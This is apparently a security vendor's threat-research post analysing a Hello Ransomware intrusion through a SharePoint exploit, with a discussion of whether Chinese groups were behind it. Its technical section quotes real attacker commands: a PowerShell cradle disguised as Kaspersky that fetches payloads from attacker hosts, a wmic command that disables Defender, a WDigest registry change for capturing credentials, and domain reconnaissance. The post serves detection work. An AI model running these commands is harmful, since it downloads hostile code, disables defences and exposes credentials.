Combine cutting-edge XDR technology, multi-signal threat intelligence and 24/7 Elite Threat Hunters to help you build a world-class security operation.
Our team delivers the fastest response time in the industry. Threat suppression within just 4 hours of being engaged.
Cyber risk and advisory programs that identify security gaps and build security strategies to address them.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
XDR with machine learning that eliminates noise, enables real-time detection and response, and automatically blocks threats.
Seamless integration and threat investigation across your existing tech stack.
Proactive threat intelligence, original threat research and a world-class team of seasoned industry veterans.
Extend your team capabilities and prevent business disruption with expertise from eSentire.
We balance automated blocks with rapid human-led investigations to manage threats.
Guard endpoints by isolating and remediating threats to prevent lateral spread.
Defend brute force attacks, active intrusions and unauthorized scans.
Investigation and threat detection across multi-cloud or hybrid environments.
Remediate misconfigurations, vulnerabilities and policy violations.
Investigate and respond to compromised identities and insider threats.
Stop ransomware before it spreads.
Meet regulatory compliance mandates.
Detect and respond to zero-day exploits.
End misconfigurations and policy violations.
Defend third-party and supply chain risk.
Prevent disruption by outsourcing MDR.
Adopt a risk-based security approach.
Meet insurability requirements with MDR.
Protect your most sensitive data.
Build a proven security program.
Operationalize timely, accurate, and actionable cyber threat intelligence.
THE THREAT In recent weeks, eSentire’s Threat Response Unit (TRU) has traced numerous email account compromise cases to infrastructure hosted on several related hosting…
Dec 10, 2024THE THREATUpdate: Security patches to address this vulnerability were released by Cleo on December 12th. Organizations need to update to Cleo Harmony, VLTrader, and LexiCom versions…
eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Multi-Signal MDR with 300+ technology integrations to support your existing investments.
24/7 SOC-as-a-Service with unlimited threat hunting and incident handling.
Three MDR package tiers are available based on per-user pricing and level of risk tolerance.
The latest security advisories, blogs, reports, industry publications and webinars published by TRU.
Compare eSentire to other Managed Detection and Response vendors to see how we stack up against the competition.
See why 2000+ organizations globally have chosen eSentire for their MDR Solution.
In late July, eSentire, a global provider of Managed and Detection and Response services, disrupted a cyberattack in midstream, in which hackers had obtained hands-on-keyboard access to the organization’s network through a vulnerable web server. Because the testing company evaluates hundreds of products from around the globe, it houses a lot of intellectual property, making it a very desirable victim.
As eSentire’s security research team, The Threat Response Unit (TRU), began to investigate the incident, they discovered some very curious findings, relating to both the threat group behind the attack, as well as the tools and techniques used in the attack.
Interestingly, the cyber gang which launched the attack mimicked much of the same Motus Operandi (MO) ----of that of the infamous Chinese cyber espionage group, Emissary Panda (a.k.a. APT27) or that of a threat group closely associated with Emissary Panda. For example, several of the infiltration tools used in this incident have been seen in past cyberattacks attributed to Chinese cyber groups.
Of course, the attack could be part of a false flag campaign. The attack chain borrows from publicly disclosed Chinese, nation-state tools and procedures, including a SharePoint exploit and the use of a popular tool called China Chopper. Additionally, the Hello Ransomware, which the threat group is known to deploy into the victims’ environment, does not appear to have a leak site or blog and the ransomware is not delivered under a typical Ransomware-as-a-Service model.
Additionally, the perceived low quality of the ransomware and the lack of any known ransomware breaches by Hello Ransomware, in addition to the threat group’s use of intrusion and reconnaissance methods which are typically associated with sophisticated actors, raises the question of whether the ransomware is the primary goal of the operators. Or are the cybercriminals dropping ransomware into their target victims’ IT environment to simply distract from their real motive---cyber espionage?
eSentire's machine learning PowerShell classifier detected a Cobalt Strike beacon deployment at a product safety testing company. Threat actors attempted to masquerade PowerShell command execution of the beacon as a Kaspersky service, attempting to bypass security controls via application whitelisting. The payload was delivered as a Metasploit payload, implying that a vulnerability was present on the target’s perimeter and was exploited.
Further investigation revealed that the target’s compromised server was hosting an out-of-date version of the Windows operating system and a vulnerable SharePoint instance. Both initial access and post-compromise behavior of this attack have previously been observed in recent Hello Ransomware incidents and resemble attack chains previously attributed to Chinese nation-state actors such as Emissary Panda and/or UNC215. Emissary Panda (referred as APT27 by the U.S. federal government) is a well-known Chinese cyberespionage group who has been active since 2010. Historically, they have targeted government, defense, technology, energy, aerospace and various manufacturing sectors, including being credited with the breach of several U.S. Defense contractors in 2010, where they reportedly stole terabytes of data. Interestingly, until 2020, Emissary Panda's primary focus appeared to be cyber espionage and intelligence gathering. However, since then several security research groups have linked Emissary Panda to multiple ransomware attacks. [1][2][3][4][5]. FireEye recently published a report stating they had not observed activity from Emissary Panda since 2015, challenging the notion that Emissary Panda was involved in recent ransomware attacks.
Evidence from this incident is presented in the Technical Details section and can be helpful for building detection rules.
Hello Ransomware incidents (including the attack against the testing company) have demonstrated several markers of a typical ransomware intrusion, and yet have some distinct characteristics. First, the Hello Ransomware is not known to use an affiliate or service model. No leak site for Hello Ransomware has been observed by eSentire’s Threat Response Unit (TRU). Secondly, the four-year history of Hello Ransomware raises many questions. A variant of Hello Ransomware first appeared on the scene in 2017, copying heavily from the publicized WannaCry ransom note, including the phrase “But you have not so enough time”. Security researchers subsequently found that several other ransomware letters used similar verbiage and formatting from the original WannaCry ransomware note. Linguists who analyzed the WannaCry ransom note in 2017 attributed the note to Chinese speakers. Law enforcement agencies from around the globe, as well as top security researchers, determined that WannaCry was the creation of the infamous hacking group, the Lazarus Group, also known as APT38, who is known to work at the behest of the North Korean government. In February 2021, the U.S. Department of Justice announced the indictment of three men they allege are members of units of the Reconnaissance General Bureau (RGB), a military intelligence agency of the Democratic People’s Republic of Korea (DPRK). The North Korean military hacking units are more commonly known in the cybersecurity community as Lazarus Group or Advanced Persistent Threat 38 (APT38). The indictment went on to say that "the three defendants were members of units of the RGB and were at times stationed by the North Korean government in other countries, including China and Russia."
Interestingly, the encryption software used to create Hello Ransomware was only available in two languages in 2017: English and Russian. It is not clear whether the 2017 variant of Hello Ransomware and the current variant are part of the same operation. In 2017, Hello Ransomware charged a flat rate of .05 Bitcoin (~$200 USD at the time) but an associated wallet (17pXroP4MruitJzpTa88FAPAGD5q5QAPzb) has no transaction history. The Hello Ransomware operators have since updated their ransom letter template and no longer have a fixed fee. In place of using a wallet address, in 2021, the operators began using anonymous email services ProtonMail and Tutenota, as well as the messaging app, WickrMe, to communicate with its victims.
The time from exploitation to hands-on activity was 15 minutes in the incident observed by TRU. The perceived low quality of the ransomware, next to the experienced intrusion methods, raises the question of whether the ransomware is the primary goal of the operators.
Finally, the attack chain borrows from known Chinese, nation-state tools and procedures (Figure 1) [5], including the SharePoint exploit and China Chopper. The Hello Ransomware’s evasion techniques can be traced back to Chinese pentesting blogs (such as websec30 and Leticia’s Blog) in early 2021.
Figure 1: Hello Ransomware TTP Chain observed by TRU (Grey Tombstones) compared to TTPs observed by other security organizations (e.g., Red = Trend Micro) in separate attacks deploying China Chopper via SharePoint exploit. The lighter colors represent a weak match between techniques and procedures while darker colors represent stronger matches.
Attribution Avoidance
In incidents with similar features observed by Palo Alto’s research team, Unit 42, they note similarities to campaigns previously attributed to Emissary Panda but hesitate to draw conclusions:
“The overlaps between these two sets of attacks include exploitation of a common vulnerability, similar toolset and a shared government victimology, but no strong pivot points to connect these attack campaigns together.” [1].
Palo Alto’s analysis did not include any mention of Hello Ransomware. Similarly, TRU has no strong evidence connecting Chinese espionage groups and Hello Ransomware, only an overlap in techniques and tools used. There are several scenarios that could explain this observation including: evolution of China’s cybercrime economy, national interest in ransomware, or a non-Chinese group intentionally adopting Chinese tactics to mislead analysis.
Reinforcing attribution uncertainty, recent analysis by FireEye suggests the 2019 SharePoint exploitation campaigns attributed to Emissary Panda by Palo Alto are operated by another Chinese espionage group, UNC215, that may or may not have a direct association with Emissary Panda [5].
The topic of China in the ransomware market is an emerging interest, but understanding the implications isn’t so straightforward. For example, U.S. accusations are related to the exploitation of Microsoft Exchange (ProxyLogon) by Chinese espionage group, Halfnium. However, it’s likely that Halfnium only provided the foothold and other threat actors independently deployed ransomware such as DearCry.
Historically, espionage groups like Emissary Panda have been known to pursue nation-state interests, as opposed to the financial interests that are more common to ransomware threat groups. Use of ransomware by an espionage group could indicate a shift to financial motivations and could also serve as a cover for larger-scale espionage operations. On the other hand, the operators behind Hello Ransomware could be unrelated to espionage or national interests or have a more convoluted and permissive relationship with Chinese national interests, like how Westerners perceive relationships between Russian cybercriminals and state agencies.
At least two countries and one security company loyal to Russian national interests have accused China of participating in the booming ransomware market. Most recently (July 2021), the Biden administration claimed that China participated in ransomware extortion campaigns against U.S. companies [6]. Before that (May 2021), Taiwan accused China’s Winnti threat group of participating in a ransomware attack on Taiwanese oil infrastructure [7]. At the end of 2020, Positive Technologies (a Russian IT company) attributed an attack to Emissary Panda that used a unique ransomware strain, which Positive Technologies dubbed Polar Ransomware [8]. This was detailed by Security Joes [2] in a report highlighting China’s interest in ransomware (Figure 2). Positive Technologies has since been accused by the U.S. of supporting national interests alongside sanctions against Russia [9].
Ultimately, the threat landscape around nation states and their relationships with domestic cybercriminals is an area of low transparency. The potential Russian origins of the application used to build the 2017 version of Hello Ransomware and the replication of known Chinese linguistics in the 2017 ransom note imply that the operators might be intentionally adopting known Chinese tactics to mislead attribution efforts.
Figure 2: History of research associating China with Ransomware. Image copied from Security Joes’ report [2].
Following are the technical details of the attack, as well as corresponding references to external observations of the same techniques and tools.
Suspected Exploit and Web Shell Activity
In the same moment that a malicious PowerShell call was observed spawning from the SharePoint IIS process, an external IP posted to Picker.aspx, as observed in previous SharePoint exploits:
POST /_layouts/15/Picker.aspx
Masquerading as Kaspersky:
Upon execution of the webshell, a PowerShell script fired, using the set-Alias command to masquerade Invoke-Expression (IEX) as kaspersky, a tactic employed in previous Hello Ransomware incidents as reported by TrendMicro [4]. The payload domain and directories from this incident (see code snippet below) also shared infrastructure naming conventions and domain with those incidents (Figure 3):
"C:\Windows\System32\cmd.exe" /c powershell.exe -nop -w hidden set-alias -name kaspersky -value Invoke-Expression; kaspersky(New-Object Net.WebClient).DownloadString(‘https://micoo.dnsrd[.]com/css/s.css’)
Additional download strings embedded in the same masqueraded PowerShell call:
DownloadString('http://micoo.dnsrd.com/css/t.css')
DownloadString('http://80.92.205.55/css/i.css')
Compared to infrastructure observed by TrendMicro:
Figure 3: Screenshot of payload download sites observed by TrendMicro [4]. Compare to what TRU observed in the code snippet above.
Cobalt Strike Injecting Mimikatz into svchost
Injection into svchost has been attributed to Emissary Panda previously [2] and is noted as a Chinese APT TTP [5] but also appears in a publicly available Cobalt Strike profile [11].
svchost.exe -k wksvc
C:\Windows\sysnative\svchost.exe -k wksvc called "NtProtectVirtualMemory"
Privilege escalation attempt via named pipe (Mimikatz):
Privilege escalation was attempted, consistent with observations by Unit 42 in previous Hello Ransomware incidents [1].
cmd.exe /c echo <id> > <Pipe Address>
Attempt to disable security monitoring:
Via Windows Management Instrumentation (wmic), another PowerShell call is deployed in a failed attempt to disable monitoring services. This command was similarly observed in previous Hello Ransomware incidents [3].
wmic /node:<host> process call create "powershell -c Set-MpPreference -PUAProtection disable;Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableBehaviorMonitoring $true"
Credential Scraping (Mimikatz):
Finally, Mimikatz is deployed to configure the system with the intention of capturing credentials from future logins via updating WDigest in the Windows registry. Mimikatz is a known tool of Emissary Panda [14] and UNC215 [5]. Emissary Panda is known to use a variant called Wrapikatz that wraps Mimikatz in a loader with defense evasion. This procedure could be consistent with the attempts at masquerading and defense disabling that preceded this malicious registry update, but it’s impossible to tell what implementation of Mimikatz was used.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
Domain Reconnaissance with Interest in Exchange
A common implementation of reconnaissance tactics in today’s threat landscape is to automatically attempt to collect all the domain information available. We hypothesize that this information is automatically collected and sent back to intruders allowing them to review successful footholds across their orchestration platform. This information helps bad actors assess the value of the company and the cost of obtaining domain admin privileges. In this case, however, domain reconnaissance commands had human-scale delays between them (Figure 4), like those measured by Palo Alto’s Unit42 [1].
Figure 4: Time delays between post-compromise commands and Mimikatz injections observed by TRU imply a human cadence.
In this incident Exchange servers were targeted during post-compromise reconnaissance.
China Chopper is a known tool of espionage groups (including Emissary Panda) [5,13] and TrendMicro has reported seeing China Chopper in previous Hello Ransomware incidents [4], while FireEye notes its usage by UNC215 [5].
Domain Trust Discovery
cmd.exe /C nltest /domain_trusts
Queries Domain Controller for "domain controllers" group
cmd.exe /C net group "domain controllers" /domain
Queries Domain Controller for "exchange servers" group
cmd.exe /C net group "exchange servers" /domain
Queries Domain Controller for "domain computers" group - No netconn observed
cmd.exe /C net group "domain computers" /domain
"domain admins" group enumeration
cmd.exe /C net group "domain admins" /domain
Time check and ping sprinkled throughout domain reconnaissance
cmd.exe /C net time /domain
cmd.exe /C ping -n 1 -4 -a <DC>
If you’re not currently engaged with a Managed Detection and Response provider, we highly recommend you partner with us for security services s to disrupt threats before they impact your business. Connect with an eSentire Security Specialist.
[1] https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
[2] https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf
[3] https://cncs.gob.do/ransomware-hello-wickrme/
[4] https://www.trendmicro.com/en_ca/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html
[5] https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
[6] https://www.nbcnews.com/tech/tech-news/us-accuses-china-abetting-ransomware-attack-rcna1448
[7] https://www.cyberscoop.com/cpc-ransomware-winnti-taiwan-china/
[8] https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
[9] https://home.treasury.gov/news/press-releases/jy0127
[10] https://twitter.com/GossiTheDog/status/1227319811685875715
[11] https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py
[12] https://attack.mitre.org/groups/G0027/
[13] https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/